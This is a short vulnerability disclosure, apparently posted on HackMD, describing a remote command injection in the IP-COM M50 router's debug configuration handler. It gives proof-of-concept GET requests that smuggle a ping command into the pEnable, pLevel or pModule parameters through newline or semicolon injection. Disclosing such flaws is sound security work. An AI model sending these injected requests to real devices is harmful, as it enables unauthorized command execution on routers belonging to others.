ip-com-2 - HackMD

# ip-com-2 vendor:IP-COM product:M50 version:V15.11.0.33(10768) type:Remote Command Injection author:Yifeng Li, Wolin Zhuang; ## Vulnerability description We found an Command Injection vulnerability in IP-COM Technology IP-COM’s M50 routers with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted GET request. ## Remote Command Injection vulnerability In formSetDebugCfg function, the parameter “pEnable”,"pLevel"and "pModule" is not filter the string delivered by the user, so we can control the pEnable such as “-h%0aping%20x.x.x.x%20-w%2-5%0a ” to attack the OS, and so on, we also can control the pLevel or pModule to attack it. ![](https://i.imgur.com/nDeTFCF.png) ## PoC ### Remote Command Injection We set the value of “pEnable”,"pLevel" or "pModule" as aaa;ping x.x.x.x; and the router will excute ping command. example.com/action/setDebugCfg?enable=-h%0aping%20x.x.x.x%20-w%2-5%0a ![](https://i.imgur.com/WW1xzGD.jpg) ![](https://i.imgur.com/GVQdNwc.jpg)